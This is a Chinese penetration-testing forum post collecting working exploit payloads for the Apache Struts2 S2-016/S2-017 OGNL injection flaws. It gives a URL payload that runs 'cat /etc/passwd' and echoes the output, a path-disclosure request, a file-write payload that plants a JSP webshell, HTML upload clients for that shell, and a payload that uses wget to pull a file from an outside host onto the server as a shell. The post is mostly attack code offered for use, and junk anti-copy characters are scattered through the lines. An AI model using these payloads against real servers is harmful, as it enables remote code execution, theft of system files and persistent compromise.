找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 Struts2 S2-016/S2-017漏洞执行代码
返回列表 发新帖
查看: 4034|回复: 0
打印 上一主题 下一主题

Struts2 S2-016/S2-017漏洞执行代码

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-7-18 23:03:05 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
大家都发了,,我就整理了一下。友情提示,自己小命比shell重要哦。。
6 E6 f$ K$ d  b/ V+ B( J& W5 a: D: q2 {% |0 r, W" D" {
喜欢就点一下感谢吧^_^9 q4 C% Q! I4 b" V8 d9 I

, x6 L) P5 y& ~& i0 z6 K- o带回显命令执行:
% K2 O0 J1 o- r4 H& V" C& Q8 E. v0 w9 }
http://www.example.com/struts2-blank/example/X.action?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passwd'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
: D# |6 h+ g+ @, v" K$ y) j) `6 w, D' Q+ ^

: B# i1 c9 P# x8 |7 G, Q; q$ O7 _2 b" k

& o/ j6 Z$ ]1 ?% Z& N# T$ t0 b8 ~
  b9 N/ K" Q" ?9 V; `+ ^# @+ l, s2 `
. |0 }4 d, X0 u2 S, c" L% l8 S3 Q
爆路径:! C6 j9 ^) |4 y) s
% w# _, n- T9 @3 J7 v6 y" d2 o, X
http://www.example.com/struts2-b ... 8%29.close%28%29%7D
1 h- G! W% z4 U# x& ]
( W7 H8 u4 ^$ R4 X% ]0 B0 W" h- |" S1 _5 {* w9 o* @0 r# L

6 R* w2 ?) j% j- {1 a
3 p4 b5 h$ L( k" E6 U
& t+ \# X) Y0 B- S, Y( `+ ~* x写文件:
% e% c4 O: F# M+ k- u7 h
6 H; O" y  f, `http://www.example.com/struts2-blank/example/X.action?redirect:${
9 Y0 u. F: e. Q2 p# x, z; `$ \+ X, ^- X& h! a
%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),
0 @% ^! q( V- d" D% u$ [+ [- O$ w0 b
) [) O, ?6 |0 K%23p%3d(%23req.getRealPath(%22/%22)%2b%22css3.jsp%22).replaceAll("\\\\", "/"),
, k& m/ U# G( p0 Q. ^. y/ n, d- R4 R; `7 Z8 Y
new+java.io.BufferedWriter(new+java.io.FileWriter(%23p)).append(%23req.getParameter(%22c%22)).close()1 n2 ~2 ^! [2 V6 w

/ F3 n+ i) O  A2 M; V}&c=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3e* D7 a, S! i9 A, J- u$ G& a
/ s0 e8 L: m* {- h" Y
2 p" s9 a/ ?- P. t' L' v
& R" D6 @3 [1 H& \+ S  W( o# d" C$ G
写入的文件内容:" ]) I* }1 L6 W# l5 y. H6 x6 x; l

$ }8 ?, z/ k& V7 F2 S2 k% k  K<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>      : {" w) L' Q7 H" b$ z6 g. a

: S* g0 B1 E" S+ D其实就是一个jsp的小马,需要客户端配合                                                                                 
5 ?, u& p  Y) [# W' X8 T
& P) F$ h5 }' S! ?, q函数f是文件名,t是内容1 C6 p- u5 X' Q3 i/ P4 F* V# B
/ ?- J8 A- D6 t& B3 }$ @5 f
客户端:
) i* X- K- J6 R7 L2 a) P  `" G3 C$ T6 u: {* s. |
<form action="http://www.example.com/struts2-blank/example/css3.jsp?f=fjp.jsp" method="post">
9 f) T. S' U3 G& \2 H" _
4 O; q0 t5 b2 ?5 Q<textarea name=t cols=120 rows=10 width=45>your code</textarea>" h) P8 s! @1 G6 h* y/ j. S
( b, n( r; S& Q4 `4 u% e* ]  Z
<center>" D. B" P; }) }4 h4 a
" \9 a# s, `! [! I
6 L& b8 Z; B& p; x
3 m. V2 U0 ]' Z) K
<input type=submit value="提交">9 r! e5 P# X4 M/ Z
* D# p1 S" r- B8 M7 @
</form>
4 z! v( s7 K" }7 e) P
  ^$ }- D2 P2 A1 t  K' M3 T/ b1 D2 |就在当前目录建立一个fjp.jsp& A- Z: [- m7 m8 c( K

+ i- u- W7 e, Q" G5 l7 eshell:http://www.example.com/struts2-blank/example/fjp.jsp$ J& D* A) C) i) Z$ g
) C: G$ r0 b0 h, n0 U! x% H

+ m" u0 N9 S1 ?2 h; y" D( R7 {3 j  x# U4 L( l( m
还有@园长的一个客户端:) d; f; l9 n' B5 e/ X; r

6 ?% m3 t, P" V8 Z! f<html>7 d' f6 ^8 J& H& K1 }" b! n

/ l% m! w) a. ~( w8 E9 O% G<head>1 i0 B" a6 D. w  q/ {
& u4 Z9 d& E7 t; T$ g" R
<meta http-equiv="content-type" content="text/html;charset=utf-8">+ m1 y1 G* a9 ~: h; \5 W

0 |( r5 C- ~  ^3 Z<title>jsp-园长</title>
1 r! z7 x: C. c+ p2 c5 P7 X( q2 E
</head>
9 k7 w6 l5 K+ w# K  b3 w- N. H5 @% A0 J( f7 l! r+ `) l% u3 W$ ^5 \
<style>0 n& C6 u6 |* L( U0 f
) n8 e  `- p5 r
.main{width:980px;height:600px;margin:0 auto;}9 U0 k4 t3 ^  ?

/ n. y- M. t6 }+ u.url{width:300px;}- b/ e. {5 D( N* S( w2 o

. k' c7 |( W: ?% d.fn{width:60px;}9 v/ d) s+ u& _: M; d

8 D( E: J* p" S) H: t. ].content{width:80%;height:60%;}
) n3 @9 {) K- Q! J) u- k! ^
: v* V$ q# _1 V* O</style>
; D9 l3 x0 U7 p( f8 f
# P) T% D' v/ P- l3 O<script>
6 H* E- v5 l# Q! k8 H5 m! e* T
6 B  E( z) H( f9 |" r: j0 x6 t/ ?  function upload(){
0 Y) Q4 L8 U& E1 C# _: _  `! }+ T, e
( a8 x% I# F" w    var url = document.getElementById('url').value,6 z- s4 U2 |9 X- f& a

3 v: y  ?. T/ Y5 A      content = document.getElementById('content').value,
$ U# s0 i) ~, m2 m9 X, z+ _
! q& Y: }7 g0 c; ?. J- [      fileName = document.getElementById('fn').value,
0 E" K( D% s  p2 `  Y+ @
' _" P, Z( i1 g4 _      form = document.getElementById('fm');
  g- _: x2 C% |$ s( d, B/ V( J" v6 `4 d1 H4 s
    if(url.length == 0){- k1 C* s0 k3 ^, [# B  _& T
" E! R4 ]( c. o
      alert("Url not allowd empty!");
- T! i" x( @. _' v6 E1 C' |
7 X) e+ |& H( V      return ;
4 F6 J9 m& M' [5 G. s& M' @3 ?& U5 ?
    }1 ]* p% O+ e6 |9 O4 c
& ]0 S6 [' Z; Z* W  |
    if(content.length == 0){* h4 d! a! a. q& m' l! ]  l8 o  F7 P# y

4 ~$ G$ L, U# A0 l& ^7 E      alert("Content not allowd empty!");
& r( R7 Z- t, B& n' g% `7 u2 e0 L7 C* I% q# a/ ]
      return ;
0 U( |" |3 K) C# p3 R/ L9 ^  m& i2 u8 _6 ]
    }1 _: M* K5 _8 c# f0 U$ Q6 \
4 E% {: q' L. r& R! ]. g( P" P
    if(fileName.length == 0){
1 L* e) ~" X+ j' G+ ?% b7 e; k6 b! e- L' j. s3 f- H8 [
      alert("FileName not allowd empty!");
2 ?" w! ?; O. H, _/ ?+ W% m/ G+ _0 B- @6 \" F, {  j
      return ;3 a# ]# a! r' ~0 {7 e6 H: s
+ E7 b  d% O5 x) U& r. p
    }/ s4 p" ]5 Z. G9 R2 P

$ w' D* ^) _" ~    form.action = url;, K& P. p1 x$ X+ s/ R% x6 V2 A
! a; Q! Q5 _. {: o9 J
    form.submit();
6 ?7 W$ F- Z, u! M1 U1 k
6 R+ |; o* t3 [: M/ s; e8 ^" N  }6 h+ y3 O0 D1 ~1 X7 @3 H. ~

0 r7 m' }0 l) L0 Q; ?% C</script>
: V! {* X  N: g; m0 G+ C
4 j7 \) y: i) A: K. n<body>
% x! g0 _6 Y. A) e
2 F  L- X1 o; y9 W<div class="main">
& o* a3 \. T8 H4 n+ E! l* W) t' T. {1 u4 x: s1 i. R
  <form id="fm" method="post">  # b7 N6 |( v% N9 r1 U
7 C2 j) q9 b" i! g  P
    URL:<input type="text" value="http://localhost/Struts2/css3.jsp" class="url" id="url"/>  
! d5 f. x3 y. M! s# A! u% O$ z3 H7 L  j$ t' [, K# I( l  L
    FileName:<input type="text" name="f" value="css.jsp" class="fn" id="fn" />  
; u- |. Z) \* z+ V3 ?+ N% Q) o& i) [; f
    <a href="javascript:upload();">Upload</a>
/ ~* _% o! J+ j4 D# F/ F! T/ Y- z; y/ \4 I5 w$ r
  `8 [; n; f8 R0 p+ j
6 l$ s. @  n8 @9 s
    <textarea id="content" class="content" name="t" ></textarea>
' M6 j7 j, |5 f6 m' Z5 a) B& k' c# b: H' b# y3 s/ k3 N' ?6 j9 a; V
  </form>+ m  E# i# q! g3 y* r7 Y
2 A0 ^& z! J' Y  Y- v* w/ m
</div>
" {, u6 ?- V; o/ F. O1 S( A) g, |' ?
</body>. S; V+ z7 c" l1 l! Q" A8 b/ Y

7 N3 G  D+ l& U+ p1 I% `! }" _</html>
( E6 `0 `+ I  u8 a1 D) \' e+ z/ P: [4 `6 e! G/ U6 |
- d& N3 L; w7 q$ D) J. I
! W5 _- u1 B. U. ?: J0 A
还有@X发的一个wget的getshell
4 T0 G4 E4 O' d0 U
0 J% o. A/ e8 {: `) k! y?redirect{%23a%3d(new  java.lang.ProcessBuilder(new java.lang.String[]{'wget','http://www.url.com/xx.txt','- O','/root/1.jsp'}3 F. G2 _3 L% ]1 F: w. b& H. ]" I

/ z/ X; M* @7 ^, @  v)).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b), %23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e), %23piaoye%3d%23context.get ('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23piaoye.getWriter().println (%23e),%23piaoye.getWriter().flush(),%23piaoye.getWriter().close()}6 }7 Z' e& i$ n& ~4 z( ^
复制代码
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表